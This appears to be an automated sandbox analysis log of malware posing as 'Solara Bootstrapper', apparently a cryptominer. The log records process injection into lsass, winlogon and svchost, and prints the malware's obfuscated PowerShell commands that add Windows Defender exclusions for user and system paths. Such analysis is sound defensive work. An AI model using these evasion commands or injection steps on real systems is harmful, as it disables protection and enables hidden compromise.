Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A49801BF4 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,2_2_0000019A49801BF4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeCode function: 0_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_004014D1
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A4980D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0000019A4980D2A4
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A49807D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0000019A49807D90
Source: C:\Users\user\AppData\Local\Temp\kx new.exeCode function: 4_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,4_2_004014D1
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001F43C547D90
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C54D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001F43C54D2A4
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E8589B7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_000001E8589B7D90
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E8589BD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_000001E8589BD2A4
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140AE867D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_00000140AE867D90
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140AE86D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_00000140AE86D2A4
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E858980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DD590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160CB90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 257E1070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F28C1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CA97FD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2652E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 254A27C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24B87DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 205FB3C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A205670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18EC1F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25CE3BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26238950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2786E560000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1611FF70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C0F350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B279570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E70A460000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22D13110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22C8C580000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2825F1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20BAEC90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C782530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: A60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24066EB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 181CEDB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A142790000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195B6F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1428DAD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DBFA550000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D76CCC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A239D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17CFA390000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FB7270000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DF53B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 164E88A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25177B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28D5D340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 24EB5E10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F153C20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D241D40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16FADAD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 20E03070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15204DB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 3050000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 175C5280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22EF1B30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 261DE4D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 226D8930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13E5E930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27234C50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28543540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 2B684340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2364AE20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 19AF2590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 232885B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C3732E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EB58D40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 29DD77B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 19A497D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F43C510000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB883E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB88E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeCode function: 46_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,46_2_0000000140001C88
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5898273C
Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: ADFC273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DD59273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CB9273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E107273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C1D273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 97FD273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 652E273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A27C273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 87DA273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FB3C273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 567273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C1F3273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E3BC273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3895273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6E56273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1FF7273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F35273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7957273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A46273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1311273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C58273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5F1D273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D9C273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEC9273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC1B273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8253273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66EB273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD9A273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CEDB273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4279273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B6F3273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8DAD273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7383273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA55273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CCC273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39D9273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA39273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B727273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53B5273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E88A273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 77B5273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D34273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B5E1273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5999273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53C2273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 41D4273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ADAD273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 307273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4DB273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 305273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C528273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 76AA273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F1B3273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F34B273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE4D273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7447273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9D0273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AF8C273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D893273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E93273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4412273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 97E3273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC87273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 698D273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 34C5273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4354273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8434273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5892273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4AE2273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F259273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 885B273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 732E273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 58D4273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D77B273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 497D273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3C51273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 883E273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 88E7273C
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: Base64 decoded <#iub#>Add-MpPreference <#vqw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dmx#> -Force <#bfi#>
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: Base64 decoded <#iub#>Add-MpPreference <#vqw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dmx#> -Force <#bfi#>Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>Jump to behavior
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CB90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFA550000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3050000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
